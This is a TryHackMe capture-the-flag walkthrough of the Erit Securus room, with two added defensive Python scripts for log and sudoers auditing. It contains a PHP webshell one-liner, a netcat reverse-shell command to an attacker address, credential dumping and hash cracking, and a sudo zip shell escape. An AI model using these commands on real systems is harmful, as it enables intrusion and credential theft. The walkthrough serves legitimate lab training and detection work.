Tryhackme Walkthrough : Erit Securus

Today we are going to solve a TryHackMe challenge called Erit Securus, designed by 4nqr34z; you can get into the room from the TryHackMe site.

Hack everyday

So without wasting too much time, let's get in.

Level: Easy

Attacking Strategy

  • Enumeration
    • Rustscan
  • Web Enumeration
  • Exploitation of Bolt CMS
    • Remote Code execution vulnerability
  • Privilege Escalation
    • Sudo rights

Enumeration

There is a saying in the field of cybersecurity: the more you search, the more you get.

We start our initial scan with Rustscan, since Rustscan is fast compared to running nmap on its own.

rustscan 10.10.99.40 --ulimit 5000 -- -A | tee nmap_result.txt
(Screenshot: Rustscan port enumeration result)

In the result we can see that ports 22 and 80 are open. From experience, I only touch SSH when I don't have any other door open, so let's enumerate port 80 first.

Web Enumeration

Opening port 80 in the browser, we find a website built on Bolt CMS. Switching on hacker vision, we start digging for login pages, a help center, or any other leak; after some time and a headache we find the login page at the path documented in the CMS's official documentation.

(Screenshot: searching the official Bolt CMS documentation)

On the login page we try the default credentials "admin : password". They work, and we are in the admin panel of the CMS.

(Screenshot: Bolt CMS login page)

Boom, we are in.

From here we have to dig for more information, such as the version and a way to upload some kind of reverse shell. We find that the CMS version is 3.7.0, which is vulnerable to a remote code execution vulnerability, and after searching on Google we find a working exploit.

"We searched on searchsploit, but that code is not working."

Exploitation

After getting the exploit from GitHub, it's time to fire it up; after successful execution of the exploit we have remote code execution.

python exploit.py http://10.10.99.40 admin password 

(Screenshot: remote code execution)

Here we get stuck: we hadn't noticed that there is no netcat on the target machine, so we have to get it there somehow.

So we put a simple PHP payload on the target, so that we can run system-level commands with the help of PHP:

echo '<?php system($_GET["c"]);?>' > c1.php
(Screenshot: placing the payload on the target machine)

After successfully placing the payload, we create a symbolic link to our local netcat binary so that we can serve it to the target with Python's HTTP server.

(Screenshot: hosting netcat with the Python HTTP server)

Now we can fetch that address from the target with the help of our PHP payload.

(Screenshot: transferring netcat to the target)

Once netcat is on the target, we can launch a reverse shell back to port 4242:

./nc -e /bin/sh 10.11.3.131 4242 
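From the defender's side, every step in this sequence (the command parameter hitting the uploaded PHP file, the fetch of netcat, the chmod and the reverse-shell launch) passes through the web server's access log as an ordinary GET request with an unusual query string. The Python script below is an added example, not code from the original writeup or from the room: it parses a few constructed Apache combined-format log lines and flags query parameters whose decoded value looks like a shell command line. The timestamps, the client address and the /files/c1.php location are assumptions made for the sample.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines for this example (not taken from the room).
# The upload location /files/c1.php is an assumption.
SAMPLE_LOG = """\
10.11.3.131 - - [12/Mar/2020:10:01:11 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.11.3.131 - - [12/Mar/2020:10:02:30 +0000] "GET /files/c1.php?c=id HTTP/1.1" 200 61 "-" "curl/7.68.0"
10.11.3.131 - - [12/Mar/2020:10:02:45 +0000] "GET /files/c1.php?c=wget%20http%3A%2F%2F10.11.3.131%3A8000%2Fnc%20-O%20%2Ftmp%2Fnc HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.11.3.131 - - [12/Mar/2020:10:03:02 +0000] "GET /files/c1.php?c=chmod%20%2Bx%20%2Ftmp%2Fnc%3B%2Ftmp%2Fnc%20-e%20%2Fbin%2Fsh%2010.11.3.131%204242 HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.11.3.131 - - [12/Mar/2020:10:03:40 +0000] "GET /search?q=hello%20world HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, ident, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Commands that commonly appear as the first word of a webshell request.
SHELL_TOOLS = {
    "id", "whoami", "uname", "cat", "ls", "wget", "curl", "nc", "netcat",
    "chmod", "sh", "bash", "python", "python3", "perl", "php",
}
# Operators that chain or substitute commands in a shell line.
SHELL_OPERATORS = (";", "|", "&&", "$(", "`")


def command_indicators(value):
    """Return the reasons a decoded parameter value looks like a shell command line."""
    reasons = []
    # Split on separators so 'chmod +x /tmp/nc;/tmp/nc -e ...' yields each command.
    for segment in re.split(r"[;|&]+", value):
        words = segment.strip().split()
        if not words:
            continue
        first = words[0].rsplit("/", 1)[-1]  # strip a path prefix such as /tmp/nc or /bin/sh
        if first in SHELL_TOOLS:
            reasons.append(f"command '{first}'")
    for op in SHELL_OPERATORS:
        if op in value:
            reasons.append(f"operator '{op}'")
    return reasons


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_webshell_commands(log_text):
    """Scan access-log text and return one finding per parameter that looks like a command."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        # parse_qs percent-decodes values, so %3B becomes ';' before inspection.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                reasons = command_indicators(value)
                if reasons:
                    findings.append({
                        "time": rec["ts"], "client": rec["ip"], "path": parts.path,
                        "param": name, "value": value, "reasons": reasons,
                    })
    return findings


if __name__ == "__main__":
    for f in find_webshell_commands(SAMPLE_LOG):
        print(f'{f["time"]} {f["client"]} {f["path"]} {f["param"]}={f["value"]!r}: {", ".join(f["reasons"])}')
```

Running this over the sample flags the three c1.php requests and leaves the ordinary search request alone. In production the same logic is far less noisy when restricted to requests for files created recently under the web root, and the fetch of a binary from a client-controlled host is worth an alert on its own.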

Here we get our reverse shell; after upgrading it to a proper shell, we move on to privilege escalation.

Privilege Escalation

Now we have access, and our main goal is to get root by any means. Before that, let's do some enumeration.

While searching the file system, one thing catches my eye: the application's database. Sometimes we can dump the user data and use it in our own way, so let's dump the database.

cd /var/www/html/app/database 
ls -la
sqlite3 bolt.db 
.tables
SELECT * from bolt_users;

We get the password hashes of some users, and with the help of john we can crack them easily.

(Screenshot: hash cracking with john)

After getting the password, we identify the matching system user by checking the passwd file:

cat /etc/passwd 

Here we find the user "wileec". We switch to this user with the cracked password and get our first flag in wileec's home directory.

We also discover the user's private key in the .ssh directory, so we download it, connect with it, and check the user's sudo rights.

(Screenshot: the user's private key)

Now let's connect to the target over SSH with the private key; once in, we discover that there is also another network present.

But before diving into that, let's look at other vectors like sudoers permissions, SUID binaries, etc.

So we check the sudoers entries for our user and find that the zip command can be run with sudo as the jsmith user, so without a second thought we exploit this to get jsmith's rights.

Here we take the help of GTFOBins to find the way to exploit it:

TF=$(mktemp -u)
sudo -u jsmith /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
/bin/bash
(Screenshot: shell as the jsmith user)
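On the blue-team side, the same GTFOBins knowledge turns into an audit: a sudo grant on a binary that can spawn a shell (zip with -TT, editors, pagers, interpreters) is effectively a grant of the whole target account. The Python below is an added example, not part of the writeup or of the room, that parses constructed sudoers-style entries and flags grants on shell-escape binaries that lack sudo's NOEXEC tag, alongside a tighter form of the entry. The sample file, the NOPASSWD tags and the jsmith entry are assumptions made for the example, not the room's real sudoers.

```python
import re
from os.path import basename

# Illustrative subset of binaries GTFOBins documents as able to run a shell
# or arbitrary commands when invoked under sudo; not the full list.
SHELL_ESCAPES = {
    "zip", "tar", "vim", "vi", "nano", "less", "more", "man", "find", "awk",
    "env", "perl", "python", "python3", "ruby", "gdb", "nmap", "ftp", "ed",
}
# sudoers tags that may prefix a command spec ("TAG: /path/cmd").
TAG_WORDS = {
    "NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
    "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT", "MAIL", "NOMAIL",
}
# user host=(runas) commands   (runas part is optional; sudo then defaults to root)
ENTRY_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)

# Constructed sudoers-style content for this example (not the room's actual file).
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
wileec  ALL=(jsmith) NOPASSWD: /usr/bin/zip
jsmith  ALL=(root) NOPASSWD: /usr/bin/less
backup  ALL=(root) NOEXEC: /usr/bin/zip
deploy  ALL=(root) /usr/bin/systemctl restart app.service
"""


def parse_command_spec(spec):
    """Split one 'TAG: /path/cmd args' spec into (tags, command, args)."""
    tags, rest = set(), []
    for tok in spec.split():
        if not rest and tok.endswith(":") and tok[:-1] in TAG_WORDS:
            tags.add(tok[:-1])
        else:
            rest.append(tok)
    if not rest:
        return tags, "", []
    return tags, rest[0], rest[1:]


def audit_sudoers(text):
    """Return one finding per command grant that hands out more than it appears to."""
    findings = []
    for raw in text.splitlines():
        # Simplified comment handling: a '#' starts a comment (uid specs like #1000 are not handled).
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        who, host, runas = m["who"], m["host"], m["runas"] or "root"
        for spec in m["cmds"].split(","):
            tags, command, _args = parse_command_spec(spec.strip())
            reason = None
            if command == "ALL":
                reason = "unrestricted command set"
            elif basename(command) in SHELL_ESCAPES and "NOEXEC" not in tags:
                reason = f"{basename(command)} can spawn a shell and is granted without NOEXEC"
            if reason:
                findings.append({"who": who, "host": host, "runas": runas,
                                 "command": command, "tags": sorted(tags), "reason": reason})
    return findings


def hardened_entry(who, host, runas, command):
    """A tighter form of a grant: NOEXEC makes sudo block the command from exec'ing sub-processes."""
    return f"{who} {host}=({runas}) NOEXEC: {command}"


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f'{f["who"]} -> {f["runas"]}: {f["command"]} ({f["reason"]})')
        if f["command"] != "ALL":
            print("  consider:", hardened_entry(f["who"], f["host"], f["runas"], f["command"]))
```

NOEXEC works by preloading a library that stubs out the exec family, so it stops zip's -TT test command from reaching /bin/sh on dynamically linked binaries, but it does not help for statically linked ones and it is a mitigation rather than a fix: the better answer to a finding is usually to remove the grant or replace it with a narrowly scoped wrapper script.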

Again we check this user's sudo rights, and again we hit it.

Here we get our root flag.

Hopefully you liked the writeup; for any query you can contact us at [email protected]

You can also DM us on Twitter with any query.
